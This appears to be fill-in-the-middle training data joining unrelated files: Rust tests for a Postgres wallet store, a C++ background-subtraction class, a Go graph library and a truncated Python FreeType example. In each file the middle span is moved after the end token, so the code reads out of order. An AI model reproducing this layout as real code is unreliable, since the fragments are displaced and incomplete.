"retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let expected_tags = { let mut tags = _tags(); tags.extend(_new_tags()); _sort(tags) }; assert_eq!(_sort(record.tags.unwrap()), expected_tags); } #[test] fn postgres_storage_add_tags_works_for_non_existing_id() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add_tags(&_type1(), &_id2(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_add_tags_works_for_non_existing_type() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add_tags(&_type2(), &_id1(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_add_tags_works_for_already_existing() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let tags_with_existing = { let mut tags = _tags(); tags.extend(_new_tags()); tags }; storage.add_tags(&_type1(), &_id1(), &tags_with_existing).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let expected_tags = { let mut tags = _tags(); tags.extend(_new_tags()); _sort(tags) };<|fim▁hole|> assert_eq!(_sort(record.tags.unwrap()), expected_tags); } #[test] fn postgres_storage_update_tags_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); storage.update_tags(&_type1(), &_id1(), &_new_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_new_tags())); } #[test] fn postgres_storage_update_tags_works_for_non_existing_id() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.update_tags(&_type1(), &_id2(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_update_tags_works_for_non_existing_type() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.update_tags(&_type1(), &_id2(), &_new_tags()); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_update_tags_works_for_already_existing() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let tags_with_existing = { let mut tags = _tags(); tags.extend(_new_tags()); tags }; storage.update_tags(&_type1(), &_id1(), &tags_with_existing).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let expected_tags = { let mut tags = _tags(); tags.extend(_new_tags()); _sort(tags) }; assert_eq!(_sort(record.tags.unwrap()), expected_tags); } #[test] fn postgres_storage_delete_tags_works() { _cleanup(); let storage = _storage(); let tag_name1 = vec![0, 0, 0]; let tag_name2 = vec![1, 1, 1]; let tag_name3 = vec![2, 2, 2]; let tag1 = Tag::Encrypted(tag_name1.clone(), vec![0, 0, 0]); let tag2 = Tag::PlainText(tag_name2.clone(), "tag_value_2".to_string()); let tag3 = Tag::Encrypted(tag_name3.clone(), vec![2, 2, 2]); 
let tags = vec![tag1.clone(), tag2.clone(), tag3.clone()]; storage.add(&_type1(), &_id1(), &_value1(), &tags).unwrap(); let tag_names = vec![TagName::OfEncrypted(tag_name1.clone()), TagName::OfPlain(tag_name2.clone())]; storage.delete_tags(&_type1(), &_id1(), &tag_names).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.tags.unwrap(), vec![tag3]); } #[test] fn postgres_storage_delete_tags_works_for_non_existing_type() { _cleanup(); let storage = _storage(); let tag_name1 = vec![0, 0, 0]; let tag_name2 = vec![1, 1, 1]; let tag_name3 = vec![2, 2, 2]; let tag1 = Tag::Encrypted(tag_name1.clone(), vec![0, 0, 0]); let tag2 = Tag::PlainText(tag_name2.clone(), "tag_value_2".to_string()); let tag3 = Tag::Encrypted(tag_name3.clone(), vec![2, 2, 2]); let tags = vec![tag1.clone(), tag2.clone(), tag3.clone()]; storage.add(&_type1(), &_id1(), &_value1(), &tags).unwrap(); let tag_names = vec![TagName::OfEncrypted(tag_name1.clone()), TagName::OfPlain(tag_name2.clone())]; let res = storage.delete_tags(&_type2(), &_id1(), &tag_names); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_delete_tags_works_for_non_existing_id() { _cleanup(); let storage = _storage(); let tag_name1 = vec![0, 0, 0]; let tag_name2 = vec![1, 1, 1]; let tag_name3 = vec![2, 2, 2]; let tag1 = Tag::Encrypted(tag_name1.clone(), vec![0, 0, 0]); let tag2 = Tag::PlainText(tag_name2.clone(), "tag_value_2".to_string()); let tag3 = Tag::Encrypted(tag_name3.clone(), vec![2, 2, 2]); let tags = vec![tag1.clone(), tag2.clone(), tag3.clone()]; storage.add(&_type1(), &_id1(), &_value1(), &tags).unwrap(); let tag_names = vec![TagName::OfEncrypted(tag_name1.clone()), TagName::OfPlain(tag_name2.clone())]; let res = storage.delete_tags(&_type1(), &_id2(), &tag_names); assert_match!(Err(WalletStorageError::ItemNotFound), res); } fn _cleanup() { let storage_type = PostgresStorageType::new(); let _ret = storage_type.delete_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])); let res = test::cleanup_storage(); res } fn _wallet_id() -> &'static str { "walle1" } fn _storage() -> Box<WalletStorage> { let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); let res = storage_type.open_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); res } fn _wallet_config() -> String { let config = json!({ "url": "localhost:5432".to_owned() }).to_string(); config } fn _wallet_credentials() -> String { let creds = json!({ "account": "postgres".to_owned(), "password": "mysecretpassword".to_owned(), "admin_account": Some("postgres".to_owned()), "admin_password": Some("mysecretpassword".to_owned()) }).to_string(); creds } fn _metadata() -> Vec<u8> { return vec![ 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 6, 7, 8 ]; } fn _type(i: u8) -> Vec<u8> { vec![i, 1 + i, 2 + i] } fn _type1() -> Vec<u8> { _type(1) } fn _type2() -> Vec<u8> { _type(2) } fn _id(i: u8) -> Vec<u8> { vec![3 + i, 4 + i, 5 + i] } fn _id1() -> Vec<u8> { _id(1) } fn _id2() -> Vec<u8> { _id(2) } fn _value(i: u8) -> EncryptedValue { EncryptedValue { data: vec![6 + i, 7 + i, 8 + i], key: vec![9 + i, 10 + i, 11 + i] } } fn _value1() -> 
EncryptedValue { _value(1) } fn _value2() -> EncryptedValue { _value(2) } fn _tags() -> Vec<Tag> { let mut tags: Vec<Tag> = Vec::new(); tags.push(Tag::Encrypted(vec![1, 5, 8], vec![3, 5, 6])); tags.push(Tag::PlainText(vec![1, 5, 8, 1], "Plain value 1".to_string())); tags.push(Tag::Encrypted(vec![2, 5, 8], vec![3, 5, 7])); tags.push(Tag::PlainText(vec![2, 5, 8, 1], "Plain value 2".to_string())); tags } fn _new_tags() -> Vec<Tag> { vec![ Tag::Encrypted(vec![1, 1, 1], vec![2, 2, 2]), Tag::PlainText(vec![1, 1, 1], String::from("tag_value_3")) ] } fn _sort(mut v: Vec<Tag>) -> Vec<Tag> { v.sort(); v } }<|fim▁end|>
<|file_name|>DPEigenbackgroundBGS.cpp<|end_file_name|><|fim▁begin|>#include "DPEigenbackgroundBGS.h" DPEigenbackgroundBGS::DPEigenbackgroundBGS() : firstTime(true), frameNumber(0), showOutput(true), threshold(225), historySize(20), embeddedDim(10) { std::cout << "DPEigenbackgroundBGS()" << std::endl; } DPEigenbackgroundBGS::~DPEigenbackgroundBGS() { std::cout << "~DPEigenbackgroundBGS()" << std::endl; } void DPEigenbackgroundBGS::process(const cv::Mat &img_input, cv::Mat &img_output) { if(img_input.empty()) return; loadConfig(); if(firstTime) saveConfig(); frame = new IplImage(img_input); if(firstTime) frame_data.ReleaseMemory(false); frame_data = frame; if(firstTime) { int width = img_input.size().width; int height = img_input.size().height; lowThresholdMask = cvCreateImage(cvSize(width, height), IPL_DEPTH_8U, 1); lowThresholdMask.Ptr()->origin = IPL_ORIGIN_BL; <|fim▁hole|> params.SetFrameSize(width, height); params.LowThreshold() = threshold; //15*15; params.HighThreshold() = 2*params.LowThreshold(); // Note: high threshold is used by post-processing //params.HistorySize() = 100; params.HistorySize() = historySize; //params.EmbeddedDim() = 20; params.EmbeddedDim() = embeddedDim; bgs.Initalize(params); bgs.InitModel(frame_data); } bgs.Subtract(frameNumber, frame_data, lowThresholdMask, highThresholdMask); lowThresholdMask.Clear(); bgs.Update(frameNumber, frame_data, lowThresholdMask); cv::Mat foreground(highThresholdMask.Ptr()); if(showOutput) cv::imshow("Eigenbackground (Oliver)", foreground); foreground.copyTo(img_output); delete frame; firstTime = false; frameNumber++; } void DPEigenbackgroundBGS::saveConfig() { CvFileStorage* fs = cvOpenFileStorage("./config/DPEigenbackgroundBGS.xml", 0, CV_STORAGE_WRITE); cvWriteInt(fs, "threshold", threshold); cvWriteInt(fs, "historySize", historySize); cvWriteInt(fs, "embeddedDim", embeddedDim); cvWriteInt(fs, "showOutput", showOutput); cvReleaseFileStorage(&fs); } void DPEigenbackgroundBGS::loadConfig() { CvFileStorage* fs = cvOpenFileStorage("./config/DPEigenbackgroundBGS.xml", 0, CV_STORAGE_READ); threshold = cvReadIntByName(fs, 0, "threshold", 225); historySize = cvReadIntByName(fs, 0, "historySize", 20); embeddedDim = cvReadIntByName(fs, 0, "embeddedDim", 10); showOutput = cvReadIntByName(fs, 0, "showOutput", true); cvReleaseFileStorage(&fs); }<|fim▁end|>
highThresholdMask = cvCreateImage(cvSize(width, height), IPL_DEPTH_8U, 1); highThresholdMask.Ptr()->origin = IPL_ORIGIN_BL;
<|file_name|>graph.go<|end_file_name|><|fim▁begin|>/* * Copyright (C) 2015 Red Hat, Inc. * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * */ package graph import ( "encoding/json" "errors" "fmt" "reflect" "strings" "sync" "time" "github.com/nu7hatch/gouuid" "github.com/skydive-project/skydive/common" "github.com/skydive-project/skydive/config" "github.com/skydive-project/skydive/filters" ) const ( maxEvents = 50 ) type graphEventType int const ( nodeUpdated graphEventType = iota + 1 nodeAdded nodeDeleted edgeUpdated edgeAdded edgeDeleted ) type Identifier string type GraphEventListener interface { OnNodeUpdated(n *Node) OnNodeAdded(n *Node) OnNodeDeleted(n *Node) OnEdgeUpdated(e *Edge) OnEdgeAdded(e *Edge) OnEdgeDeleted(e *Edge) } type graphEvent struct { kind graphEventType element interface{} listener GraphEventListener } type Metadata map[string]interface{} type MetadataTransaction struct { graph *Graph graphElement interface{} metadata Metadata } type graphElement struct { ID Identifier metadata Metadata host string createdAt time.Time deletedAt time.Time } type Node struct { graphElement } type Edge struct { graphElement parent Identifier child Identifier } type GraphBackend interface { AddNode(n *Node) bool DelNode(n *Node) bool GetNode(i Identifier, at *common.TimeSlice) []*Node GetNodeEdges(n *Node, at *common.TimeSlice, m Metadata) []*Edge AddEdge(e *Edge) bool DelEdge(e *Edge) bool GetEdge(i Identifier, at *common.TimeSlice) []*Edge GetEdgeNodes(e *Edge, at *common.TimeSlice, parentMetadata, childMetadata Metadata) ([]*Node, []*Node) AddMetadata(e interface{}, k string, v interface{}) bool SetMetadata(e interface{}, m Metadata) bool GetNodes(t *common.TimeSlice, m Metadata) []*Node GetEdges(t *common.TimeSlice, m Metadata) []*Edge WithContext(graph *Graph, context GraphContext) (*Graph, error) } type GraphContext struct { TimeSlice *common.TimeSlice } type Graph struct { sync.RWMutex backend GraphBackend context GraphContext host string eventListeners []GraphEventListener eventChan chan graphEvent eventConsumed bool currentEventListener GraphEventListener } type HostNodeTIDMap map[string][]string func BuildHostNodeTIDMap(nodes []*Node) HostNodeTIDMap { hnmap := make(HostNodeTIDMap) for _, node := range nodes { if host := node.Host(); host != "" { hnmap[host] = append(hnmap[host], string(node.ID)) } } return hnmap } // default implementation of a graph listener, can be used when not implementing // the whole set of callbacks type DefaultGraphListener struct { } func (d *DefaultGraphListener) OnNodeUpdated(n *Node) { } func (c *DefaultGraphListener) OnNodeAdded(n *Node) { } func (c *DefaultGraphListener) OnNodeDeleted(n *Node) { } func (c *DefaultGraphListener) OnEdgeUpdated(e *Edge) { } func (c *DefaultGraphListener) OnEdgeAdded(e *Edge) { } func (c 
*DefaultGraphListener) OnEdgeDeleted(e *Edge) { } func GenID() Identifier { u, _ := uuid.NewV4() return Identifier(u.String()) } func (m *Metadata) String() string { j, _ := json.Marshal(m) return string(j) } func (e *graphElement) Host() string { return e.host } func (e *graphElement) GetFieldInt64(field string) (_ int64, err error) { f, found := e.GetField(field) if !found { return 0, common.ErrFieldNotFound } return common.ToInt64(f) } func (e *graphElement) GetFieldString(field string) (_ string, err error) { f, found := e.GetField(field) if !found { return "", common.ErrFieldNotFound } s, ok := f.(string) if !ok { return "", common.ErrFieldNotFound } return s, nil } func (e *graphElement) GetField(name string) (interface{}, bool) { switch name { case "ID": return string(e.ID), true case "Host": return e.host, true case "CreatedAt": return e.createdAt.Unix(), true case "DeletedAt": return e.deletedAt.Unix(), true default: if strings.HasPrefix(name, "Metadata/") { name = name[9:] } v, ok := e.Metadata()[name] return v, ok } } func (e *graphElement) Metadata() Metadata { return e.metadata } func (e *graphElement) MatchMetadata(f Metadata) bool { for k, v := range f { switch v := v.(type) { case *filters.Filter: if !v.Eval(e) { return false } default: nv, ok := e.metadata[k] if !ok || !common.CrossTypeEqual(nv, v) { return false } } } return true } func (e *graphElement) String() string { deletedAt := "" if !e.deletedAt.IsZero() { deletedAt = e.deletedAt.String() } j, _ := json.Marshal(&struct { ID Identifier Metadata Metadata `json:",omitempty"` Host string CreatedAt string DeletedAt string `json:",omitempty"` }{ ID: e.ID, Metadata: e.metadata, Host: e.host, CreatedAt: e.createdAt.String(), DeletedAt: deletedAt, }) return string(j) } func parseTime(i interface{}) (t time.Time, err error) { var epoch int64 switch i := i.(type) { case int64: epoch = i case json.Number: epoch, err = i.Int64() if err != nil { return t, err } default: return t, fmt.Errorf("Invalid time: %+v", i) } return time.Unix(epoch, 0), err } func (e *graphElement) Decode(i interface{}) (err error) { objMap, ok := i.(map[string]interface{}) if !ok { return fmt.Errorf("Unable to decode graph element: %v, %+v", i, reflect.TypeOf(i)) } e.ID = Identifier(objMap["ID"].(string)) e.host = objMap["Host"].(string) if createdAt, ok := objMap["CreatedAt"]; ok { if e.createdAt, err = parseTime(createdAt); err != nil { return err } } if deletedAt, ok := objMap["DeletedAt"]; ok { if e.deletedAt, err = parseTime(deletedAt); err != nil { return err } } if m, ok := objMap["Metadata"]; ok { e.metadata = make(Metadata) for field, value := range m.(map[string]interface{}) { if n, ok := value.(json.Number); ok { if value, err = n.Int64(); err == nil { value = value.(int64) } else { value, _ = n.Float64() } } e.metadata[field] = value } } return nil } func (n *Node) MarshalJSON() ([]byte, error) { deletedAt := int64(0) if !n.deletedAt.IsZero() { deletedAt = n.deletedAt.Unix() } return json.Marshal(&struct { ID Identifier Metadata Metadata `json:",omitempty"` Host string CreatedAt int64 DeletedAt int64 `json:",omitempty"` }{ ID: n.ID, Metadata: n.metadata, Host: n.host, CreatedAt: n.createdAt.Unix(), DeletedAt: deletedAt, }) } func (n *Node) JsonRawMessage() *json.RawMessage { r, _ := n.MarshalJSON() raw := json.RawMessage(r) return &raw } func (n *Node) Decode(i interface{}) error { return n.graphElement.Decode(i) } func (e *Edge) GetFieldString(name string) (string, error) { switch name { case "Parent": return string(e.parent), nil case 
"Child": return string(e.child), nil default: return e.graphElement.GetFieldString(name) } } func (e *Edge) MarshalJSON() ([]byte, error) { deletedAt := int64(0) if !e.deletedAt.IsZero() { deletedAt = e.deletedAt.Unix() } return json.Marshal(&struct { ID Identifier Metadata Metadata `json:",omitempty"` Parent Identifier Child Identifier Host string CreatedAt int64 DeletedAt int64 `json:",omitempty"` }{ ID: e.ID, Metadata: e.metadata, Parent: e.parent, Child: e.child, Host: e.host, CreatedAt: e.createdAt.Unix(), DeletedAt: deletedAt, }) } func (e *Edge) JsonRawMessage() *json.RawMessage { r, _ := e.MarshalJSON() raw := json.RawMessage(r) return &raw } func (e *Edge) Decode(i interface{}) error { if err := e.graphElement.Decode(i); err != nil { return err } objMap := i.(map[string]interface{}) e.parent = Identifier(objMap["Parent"].(string)) e.child = Identifier(objMap["Child"].(string))<|fim▁hole|> return e.parent } func (e *Edge) GetChild() Identifier { return e.child } func (c *GraphContext) GetTimeSlice() *common.TimeSlice { return c.TimeSlice } func (g *Graph) SetMetadata(i interface{}, m Metadata) bool { var e *graphElement ge := graphEvent{element: i} switch i := i.(type) { case *Node: e = &i.graphElement ge.kind = nodeUpdated case *Edge: e = &i.graphElement ge.kind = edgeUpdated } if len(m) == len(e.metadata) { unchanged := true for k, v := range m { if e.metadata[k] != v { unchanged = false break } } if unchanged { return false } } if !g.backend.SetMetadata(i, m) { return false } e.metadata = m g.notifyEvent(ge) return true } func (g *Graph) AddMetadata(i interface{}, k string, v interface{}) bool { var e *graphElement ge := graphEvent{element: i} switch i.(type) { case *Node: e = &i.(*Node).graphElement ge.kind = nodeUpdated case *Edge: e = &i.(*Edge).graphElement ge.kind = edgeUpdated } if o, ok := e.metadata[k]; ok && o == v { return false } if !g.backend.AddMetadata(i, k, v) { return false } e.metadata[k] = v g.notifyEvent(ge) return true } func (g *Graph) DelMetadata(i interface{}, k string) bool { var m Metadata ge := graphEvent{element: i} switch i.(type) { case *Node: m = i.(*Node).graphElement.metadata ge.kind = nodeUpdated case *Edge: m = i.(*Edge).graphElement.metadata ge.kind = edgeUpdated } if _, ok := m[k]; !ok { return false } if !g.backend.SetMetadata(i, m) { return false } delete(m, k) g.notifyEvent(ge) return true } func (t *MetadataTransaction) AddMetadata(k string, v interface{}) { t.metadata[k] = v } func (t *MetadataTransaction) DelMetadata(k string, v interface{}) { delete(t.metadata, k) } func (t *MetadataTransaction) Metadata() Metadata { return t.metadata } func (t *MetadataTransaction) Commit() { var e graphElement ge := graphEvent{element: t.graphElement} switch t.graphElement.(type) { case *Node: e = t.graphElement.(*Node).graphElement ge.kind = nodeUpdated case *Edge: e = t.graphElement.(*Edge).graphElement ge.kind = edgeUpdated } updated := false for k, v := range t.metadata { if e.metadata[k] != v { e.metadata[k] = v if !t.graph.backend.AddMetadata(t.graphElement, k, v) { return } updated = true } } if updated { t.graph.notifyEvent(ge) } } func (g *Graph) StartMetadataTransaction(i interface{}) *MetadataTransaction { var e graphElement switch i.(type) { case *Node: e = i.(*Node).graphElement case *Edge: e = i.(*Edge).graphElement } t := MetadataTransaction{ graph: g, graphElement: i, metadata: make(Metadata), } for k, v := range e.metadata { t.metadata[k] = v } return &t } func (g *Graph) lookupShortestPath(n *Node, m Metadata, path []*Node, v 
map[Identifier]bool, em Metadata) []*Node { v[n.ID] = true newPath := make([]*Node, len(path)+1) copy(newPath, path) newPath[len(path)] = n if n.MatchMetadata(m) { return newPath } t := g.context.GetTimeSlice() shortest := []*Node{} for _, e := range g.backend.GetNodeEdges(n, t, em) { parents, children := g.backend.GetEdgeNodes(e, t, nil, nil) if len(parents) == 0 || len(children) == 0 { continue } parent, child := parents[0], children[0] var neighbor *Node if parent.ID != n.ID && !v[parent.ID] { neighbor = parent } if child.ID != n.ID && !v[child.ID] { neighbor = child } if neighbor != nil { nv := make(map[Identifier]bool) for k, v := range v { nv[k] = v } sub := g.lookupShortestPath(neighbor, m, newPath, nv, em) if len(sub) > 0 && (len(shortest) == 0 || len(sub) < len(shortest)) { shortest = sub } } } // check that the last element is the one we looked for if len(shortest) > 0 && !shortest[len(shortest)-1].MatchMetadata(m) { return []*Node{} } return shortest } func (g *Graph) LookupShortestPath(n *Node, m Metadata, em Metadata) []*Node { return g.lookupShortestPath(n, m, []*Node{}, make(map[Identifier]bool), em) } func (g *Graph) LookupParents(n *Node, f Metadata, em Metadata) (nodes []*Node) { t := g.context.GetTimeSlice() for _, e := range g.backend.GetNodeEdges(n, t, em) { if e.GetChild() == n.ID { parents, _ := g.backend.GetEdgeNodes(e, t, f, Metadata{}) for _, parent := range parents { nodes = append(nodes, parent) } } } return } func (g *Graph) LookupFirstChild(n *Node, f Metadata) *Node { nodes := g.LookupChildren(n, f, Metadata{}) if len(nodes) > 0 { return nodes[0] } return nil } func (g *Graph) LookupChildren(n *Node, f Metadata, em Metadata) (nodes []*Node) { t := g.context.GetTimeSlice() for _, e := range g.backend.GetNodeEdges(n, t, em) { if e.GetParent() == n.ID { _, children := g.backend.GetEdgeNodes(e, t, Metadata{}, f) for _, child := range children { nodes = append(nodes, child) } } } return nodes } func (g *Graph) AreLinked(n1 *Node, n2 *Node, m Metadata) bool { t := g.context.GetTimeSlice() for _, e := range g.backend.GetNodeEdges(n1, t, m) { parents, children := g.backend.GetEdgeNodes(e, t, Metadata{}, Metadata{}) if len(parents) == 0 || len(children) == 0 { continue } for i, parent := range parents { if children[i].ID == n2.ID || parent.ID == n2.ID { return true } } } return false } func (g *Graph) Link(n1 *Node, n2 *Node, m Metadata) *Edge { u, _ := uuid.NewV5(uuid.NamespaceOID, []byte(string(n1.ID)+string(n2.ID))) if len(m) > 0 { return g.NewEdge(Identifier(u.String()), n1, n2, m) } return g.NewEdge(Identifier(u.String()), n1, n2, nil) } func (g *Graph) Unlink(n1 *Node, n2 *Node) { for _, e := range g.backend.GetNodeEdges(n1, nil, Metadata{}) { parents, children := g.backend.GetEdgeNodes(e, nil, Metadata{}, Metadata{}) if len(parents) == 0 || len(children) == 0 { continue } parent, child := parents[0], children[0] if child.ID == n2.ID || parent.ID == n2.ID { g.DelEdge(e) } } } func (g *Graph) Replace(o *Node, n *Node) *Node { for _, e := range g.backend.GetNodeEdges(o, nil, Metadata{}) { parents, children := g.backend.GetEdgeNodes(e, nil, Metadata{}, Metadata{}) if len(parents) == 0 || len(children) == 0 { continue } parent, child := parents[0], children[0] g.DelEdge(e) if parent.ID == n.ID { g.Link(n, child, e.metadata) } else { g.Link(parent, n, e.metadata) } } n.metadata = o.metadata g.notifyEvent(graphEvent{element: n, kind: nodeUpdated}) g.DelNode(o) return n } func (g *Graph) LookupFirstNode(m Metadata) *Node { nodes := g.GetNodes(m) if len(nodes) > 0 { 
return nodes[0] } return nil } func (g *Graph) AddEdge(e *Edge) bool { if !g.backend.AddEdge(e) { return false } g.notifyEvent(graphEvent{element: e, kind: edgeAdded}) return true } func (g *Graph) GetEdge(i Identifier) *Edge { if edges := g.backend.GetEdge(i, g.context.GetTimeSlice()); len(edges) != 0 { return edges[0] } return nil } func (g *Graph) AddNode(n *Node) bool { if !g.backend.AddNode(n) { return false } g.notifyEvent(graphEvent{element: n, kind: nodeAdded}) return true } func (g *Graph) GetNode(i Identifier) *Node { if nodes := g.backend.GetNode(i, g.context.GetTimeSlice()); len(nodes) != 0 { return nodes[0] } return nil } func (g *Graph) NewNode(i Identifier, m Metadata, h ...string) *Node { hostname := g.host if len(h) > 0 { hostname = h[0] } n := &Node{ graphElement: graphElement{ ID: i, host: hostname, createdAt: time.Now().UTC(), }, } if m != nil { n.metadata = m } else { n.metadata = make(Metadata) } if !g.AddNode(n) { return nil } return n } func (g *Graph) NewEdge(i Identifier, p *Node, c *Node, m Metadata) *Edge { e := &Edge{ parent: p.ID, child: c.ID, graphElement: graphElement{ ID: i, host: g.host, createdAt: time.Now().UTC(), }, } if m != nil { e.metadata = m } else { e.metadata = make(Metadata) } if !g.AddEdge(e) { return nil } return e } func (g *Graph) DelEdge(e *Edge) { if g.backend.DelEdge(e) { e.deletedAt = time.Now().UTC() g.notifyEvent(graphEvent{element: e, kind: edgeDeleted}) } } func (g *Graph) DelNode(n *Node) { for _, e := range g.backend.GetNodeEdges(n, nil, Metadata{}) { g.DelEdge(e) } if g.backend.DelNode(n) { n.deletedAt = time.Now().UTC() g.notifyEvent(graphEvent{element: n, kind: nodeDeleted}) } } func (g *Graph) DelHostGraph(host string) { for _, node := range g.GetNodes(Metadata{}) { if node.host == host { g.DelNode(node) } } } func (g *Graph) GetNodes(m Metadata) []*Node { return g.backend.GetNodes(g.context.GetTimeSlice(), m) } func (g *Graph) GetEdges(m Metadata) []*Edge { return g.backend.GetEdges(g.context.GetTimeSlice(), m) } func (g *Graph) GetEdgeNodes(e *Edge, parentMetadata, childMetadata Metadata) ([]*Node, []*Node) { return g.backend.GetEdgeNodes(e, g.context.GetTimeSlice(), parentMetadata, childMetadata) } func (g *Graph) GetNodeEdges(n *Node, m Metadata) []*Edge { return g.backend.GetNodeEdges(n, g.context.GetTimeSlice(), m) } func (g *Graph) String() string { j, _ := json.Marshal(g) return string(j) } func (g *Graph) MarshalJSON() ([]byte, error) { return json.Marshal(&struct { Nodes []*Node Edges []*Edge }{ Nodes: g.GetNodes(Metadata{}), Edges: g.GetEdges(Metadata{}), }) } func (g *Graph) notifyEvent(ge graphEvent) { // push event to chan so that nested notifications will be sent in the // right order. Associate the event with the current event listener so // we can avoid loops by not triggering events for the current listener. 
ge.listener = g.currentEventListener g.eventChan <- ge // a consumer is already running; no need to start another one if g.eventConsumed { return } g.eventConsumed = true for len(g.eventChan) > 0 { ge = <-g.eventChan // notify each listener only once per event: notifying more than once would mean we are in a // recursion, and we don't want to notify a listener with a graph element it generated itself for _, g.currentEventListener = range g.eventListeners { // do not notify the listener which generated the event if g.currentEventListener == ge.listener { continue } switch ge.kind { case nodeAdded: g.currentEventListener.OnNodeAdded(ge.element.(*Node)) case nodeUpdated: g.currentEventListener.OnNodeUpdated(ge.element.(*Node)) case nodeDeleted: g.currentEventListener.OnNodeDeleted(ge.element.(*Node)) case edgeAdded: g.currentEventListener.OnEdgeAdded(ge.element.(*Edge)) case edgeUpdated: g.currentEventListener.OnEdgeUpdated(ge.element.(*Edge)) case edgeDeleted: g.currentEventListener.OnEdgeDeleted(ge.element.(*Edge)) } } } g.currentEventListener = nil g.eventConsumed = false } func (g *Graph) AddEventListener(l GraphEventListener) { g.Lock() defer g.Unlock() g.eventListeners = append(g.eventListeners, l) } func (g *Graph) RemoveEventListener(l GraphEventListener) { g.Lock() defer g.Unlock() for i, el := range g.eventListeners { if l == el { g.eventListeners = append(g.eventListeners[:i], g.eventListeners[i+1:]...) break } } } func (g *Graph) WithContext(c GraphContext) (*Graph, error) { return g.backend.WithContext(g, c) } func (g *Graph) GetContext() GraphContext { return g.context } func (g *Graph) GetHost() string { return g.host } func NewGraph(host string, backend GraphBackend) *Graph { return &Graph{ backend: backend, host: host, context: GraphContext{}, eventChan: make(chan graphEvent, maxEvents), } } func NewGraphFromConfig(backend GraphBackend) *Graph { host := config.GetConfig().GetString("host_id") return NewGraph(host, backend) } func NewGraphWithContext(hostID string, backend GraphBackend, context GraphContext) (*Graph, error) { graph := NewGraph(hostID, backend) return graph.WithContext(context) } func BackendFromConfig() (backend GraphBackend, err error) { name := config.GetConfig().GetString("graph.backend") if len(name) == 0 { name = "memory" } switch name { case "memory": backend, err = NewMemoryBackend() case "orientdb": backend, err = NewOrientDBBackendFromConfig() case "elasticsearch": backend, err = NewElasticSearchBackendFromConfig() default: return nil, errors.New("Config file is misconfigured, graph backend unknown: " + name) } if err != nil { return nil, err } return backend, nil }<|fim▁end|>
return nil } func (e *Edge) GetParent() Identifier {
<|file_name|>glyph-vector.py<|end_file_name|><|fim▁begin|># ----------------------------------------------------------------------------- # # FreeType high-level python API - Copyright 2011 Nicolas P. Rougier # Distributed under the terms of the new BSD license. # # ----------------------------------------------------------------------------- ''' Show how to access glyph outline description. ''' from freetype import * if __name__ == '__main__': import numpy import matplotlib.pyplot as plt from matplotlib.path import Path import matplotlib.patches as patches face = Face(b'./Vera.ttf') face.set_char_size( 48*64 ) face.load_char('S') slot = face.glyph outline = slot.outline points = numpy.array(outline.points, dtype=[('x',float), ('y',float)]) x, y = points['x'], points['y'] figure = plt.figure(figsize=(8,10)) axis = figure.add_subplot(111) #axis.scatter(points['x'], points['y'], alpha=.25) start, end = 0, 0 VERTS, CODES = [], [] # Iterate over each contour for i in range(len(outline.contours)): end = outline.contours[i] points = outline.points[start:end+1] points.append(points[0]) tags = outline.tags[start:end+1] tags.append(tags[0]) segments = [ [points[0],], ] for j in range(1, len(points) ): segments[-1].append(points[j]) if tags[j] & (1 << 0) and j < (len(points)-1): segments.append( [points[j],] ) verts = [points[0], ] codes = [Path.MOVETO,] for segment in segments: if len(segment) == 2: verts.extend(segment[1:]) codes.extend([Path.LINETO]) elif len(segment) == 3: verts.extend(segment[1:]) codes.extend([Path.CURVE3, Path.CURVE3]) else: verts.append(segment[1]) 